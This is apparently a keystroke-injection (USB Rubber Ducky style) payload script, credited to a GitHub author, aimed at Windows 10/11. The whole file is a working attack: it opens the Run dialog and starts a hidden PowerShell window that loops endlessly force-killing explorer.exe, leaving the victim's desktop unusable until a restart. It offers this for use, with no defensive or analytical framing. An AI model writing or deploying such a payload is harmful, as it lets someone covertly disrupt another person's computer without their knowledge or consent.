REM ┌──────────────────────────────────────────────┐
REM │ hooker01 | github.com/hooker01                                │
REM │ Description: Script to silently and repeatedly stop           │
REM │              explorer.exe on Windows, disrupting the          │
REM │              user interface until system restart.             │
REM │ Target: win10/11                                              │
REM └──────────────────────────────────────────────┘


DELAY 500
GUI r
DELAY 500
STRING powershell -NoProfile -WindowStyle Hidden -Command "while ($true) {Stop-Process -Name explorer -Force}"
ENTER